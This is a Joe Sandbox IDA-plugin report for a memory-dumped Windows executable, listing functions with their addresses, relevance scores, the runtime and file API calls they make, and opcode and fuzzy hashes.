Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
Instruction ID: 899556df24d1240243a510df2ced368ef94d61a771985846b87801c842b34331
Opcode Fuzzy Hash: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
Instruction Fuzzy Hash: 4A91D263E2866285F7509F6596403FDABA0FB44B88F148139DE0E976C8DF7BD442C70A

Function 00007FF6E60BFCEC Relevance: 6.2, APIs: 4, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6E60BFDDC
_get_daylight.LIBCMT ref: 00007FF6E60BFDED
_get_daylight.LIBCMT ref: 00007FF6E60BFDFE
_isindst.LIBCMT ref: 00007FF6E60BFEC9

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
Instruction ID: dbaae605a174a0d4ad378825ec9d1a22bb2b9239f6532ca101f7096b2bee768c
Opcode Fuzzy Hash: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
Instruction Fuzzy Hash: 6251F773F2422246FB24CF249A457BC27A1AB40368F109135DD2ED7AEAEF3BA441C705

Function 00007FF6E60AC07C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF6E60AC08B

Part of subcall function 00007FF6E60AC24C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6E60AC26E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6E60AC0A0
__scrt_release_startup_lock.LIBCMT ref: 00007FF6E60AC10E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6E60AC161

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
Instruction ID: 47ccc8f95ef8bbe0a561b6ca6e4e36fda7d4d77dae11c139fe3a304515a3ad43
Opcode Fuzzy Hash: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
Instruction Fuzzy Hash: 15311C33F2C27341FAA4AB6497513B923919F427C4F864435E94ECB2D7CE2FA844861B

Function 00007FF6E60B5700 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B572D
CreateFileW.KERNELBASE ref: 00007FF6E60B576C
CloseHandle.KERNEL32 ref: 00007FF6E60B57A1

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 067efb2484132faf2230e026e28e03925482aae0486071d1b8d39b4e2754336b
Instruction ID: 7c1fade1599cc84c53e36ee7b7e0af6cd1e357b1e1973bf3333dd1f5431222ca
Opcode Fuzzy Hash: 067efb2484132faf2230e026e28e03925482aae0486071d1b8d39b4e2754336b
Instruction Fuzzy Hash: 2D419323E2879283E7519F20A6103796360FF94764F10D374EA9C47ADADFBEA5E08705

Function 00007FF6E60B9FC0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6E60B9FBC), ref: 00007FF6E60B9FD1
TerminateProcess.KERNEL32(?,?,?,00007FF6E60B9FBC), ref: 00007FF6E60B9FDC
ExitProcess.KERNEL32 ref: 00007FF6E60B9FEB

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
Instruction ID: f7fcd12de154b5314300b46ae27749178ae0b82c605cee19f4cff57a07970ff8
Opcode Fuzzy Hash: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
Instruction Fuzzy Hash: 82D05E12F3862742EB142B711A8837C02155F89701F20543CE80B8A397CE3FA80D421A

Function 00007FF6E60B027C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B02C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B03B7

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
Instruction ID: 8a8efaee42b4edcf294dfc17ceb8752dd15a398cb89d1b913044a2896abd81c4
Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
Instruction Fuzzy Hash: 06511763B2926146FA789E26960477A6281FF40BA4F04C734DD6E877CDCF3FD500860A

Function 00007FF6E60BC6F4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6E60BC88D), ref: 00007FF6E60BC740
GetLastError.KERNEL32(?,?,?,?,?,00007FF6E60BC88D), ref: 00007FF6E60BC74A

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
Instruction ID: 1305a46d423ab1239b65cd402e56e24c9116d7eb299f0b9fd6e982761f5bbbd1
Opcode Fuzzy Hash: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
Instruction Fuzzy Hash: 8F112723728BA181DA508B25B6042697361FB44BF4F544331EEBD8B7E9CF7ED0518709

Function 00007FF6E60B80BC Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60B7F39), ref: 00007FF6E60B80DF
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60B7F39), ref: 00007FF6E60B80F5

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 6407c983105320eb51bd989624a62bc8d87a63a3f1faf402972498077c5d17e8
Instruction ID: cd6c524e149e7242fc927e9e091aca6c1f2ea610ef4ed5e010a86a31c0a00f50
Opcode Fuzzy Hash: 6407c983105320eb51bd989624a62bc8d87a63a3f1faf402972498077c5d17e8
Instruction Fuzzy Hash: 9D018E3352C26282E7508F14A50137EB7A0FB81BB1F604235E6A9855E8DF3FD040CB09

Function 00007FF6E60BAF0C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF22
GetLastError.KERNEL32(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF2C

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
Instruction ID: 128c4cffc1046c8998cfb36baadddb5fced5b5ee58b91d693a736bc4a2361c6f
Opcode Fuzzy Hash: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
Instruction Fuzzy Hash: D4E08652F2932342FF056BF1564937511509F88B01F4084B4C80EC6357DF2F6885431A

Function 00007FF6E60B7E24 Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNELBASE ref: 00007FF6E60B7E28
GetLastError.KERNEL32 ref: 00007FF6E60B7E32

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
Instruction ID: 7f555e09f670ad173906c611165935761754701390e534a312cdaf64ca2e10ff
Opcode Fuzzy Hash: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
Instruction Fuzzy Hash: 47D01212F3D62381E65527711E9537D15906F48736F604670C03FC42E5EF2FA895523B

Function 00007FF6E60B86A8 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE ref: 00007FF6E60B86AC
GetLastError.KERNEL32 ref: 00007FF6E60B86B6

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
Instruction ID: 4cc636dc6d7c7a1cccc57d2e8a1c1a2d1e8df5b4563a20ff5d922086f5bba589
Opcode Fuzzy Hash: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
Instruction Fuzzy Hash: 33D0C912E3962381E6542BB60A4523913946F44736F604630C02AC11F5DF6FA455092B

Function 00007FF6E60BB11C Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF6E60BAF99,?,?,00000000,00007FF6E60BB04E), ref: 00007FF6E60BB18A
GetLastError.KERNEL32(?,?,?,00007FF6E60BAF99,?,?,00000000,00007FF6E60BB04E), ref: 00007FF6E60BB194

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
Instruction ID: b02cc102d01a96ce3c227b2891bf25ea160a039cafd140db53bd778f21d85359
Opcode Fuzzy Hash: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
Instruction Fuzzy Hash: 2C21F623F386A242FE609B6496543792381AF847E0F488635DA1EC73D9CF6FE445830B

Function 00007FF6E60A7D40 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6E60A8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8B1A

_findclose.LIBCMT ref: 00007FF6E60A7F99

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ByteCharMultiWide_findclose
String ID:
API String ID: 2772937645-0
Opcode ID: 6a56ecc169b874fe1e233505f6f9a5acf1cae56fd8a9bc6900038e6ac80cd412
Instruction ID: e7a322a3c5f54267dbf1ab6e13a66ebc716d528e21771c09c25f4ae64b9ffe94
Opcode Fuzzy Hash: 6a56ecc169b874fe1e233505f6f9a5acf1cae56fd8a9bc6900038e6ac80cd412
Instruction Fuzzy Hash: 3371AF53E28AC581E611CB2CC6053FD6360F7A9B8CF54E325DB9C52592EF2AE2C9C704

Function 00007FF6E60BC46C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60BC494

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
Instruction ID: 771e6b53cd392b9482b7e95f7323916c341784b4c1216267503dc3f89c60d001
Opcode Fuzzy Hash: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
Instruction Fuzzy Hash: BF41F73392826187EA64DB19E74037973A0EB55740F104131D69EC3699CF7FE542CB5A

Function 00007FF6E60A82B0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6E60A835A

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 91536ea0e9ff7e78fb352db3075123ca00dbd7008e392a7af2ef7617843ed8a4
Instruction ID: 2249e383f985ac510b221f1dd2298f1427cf74c23f652b1291ae2982ae5ef4fd
Opcode Fuzzy Hash: 91536ea0e9ff7e78fb352db3075123ca00dbd7008e392a7af2ef7617843ed8a4
Instruction Fuzzy Hash: CC21D633B2827245FB10DA1266043FAA651BF45BE4F8C5430EE9D87786CE3FE505C20A

Function 00007FF6E60BBEFC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60BBF82

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 33c1c355f770a45dc32ec47b5556db51f5a056321d098f55ce731dda09118c74
Instruction ID: d61071c01b0b41ac759b6fafb6a29b39475bd9798fd66426672d1fe74a9aa964
Opcode Fuzzy Hash: 33c1c355f770a45dc32ec47b5556db51f5a056321d098f55ce731dda09118c74
Instruction Fuzzy Hash: A431CF23A3863282F741AF518A0037C2650EF80BA5F418536EA1D873D7CF7FE4528B1A

Function 00007FF6E60B9EF1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6E60B9F1F

Part of subcall function 00007FF6E60BA018: GetModuleHandleExW.KERNEL32 ref: 00007FF6E60BA03D
Part of subcall function 00007FF6E60BA018: GetProcAddress.KERNEL32 ref: 00007FF6E60BA053
Part of subcall function 00007FF6E60BA018: FreeLibrary.KERNEL32 ref: 00007FF6E60BA07A

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
Instruction ID: e3366429c0f1f3b90e81b16809dcd40a9f93d0d606295886a959619d00c34874
Opcode Fuzzy Hash: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
Instruction Fuzzy Hash: 12218E32E247568AEB248F64C4443EC33A4FB05728F548639E71D86ADDDF3AD984CB45

Function 00007FF6E60B64A8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B640D

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction ID: 8ce4167fa5717f0569b745bd5ffefb5edbbb9c01c8f2ee68d764c3bc477f5b2d
Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction Fuzzy Hash: 17119623E3CA6181EA619F11961137EA260FF85B84F048431EB4DD7B8ADF7FD440870A

Function 00007FF6E60C6CAC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C6CCF

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

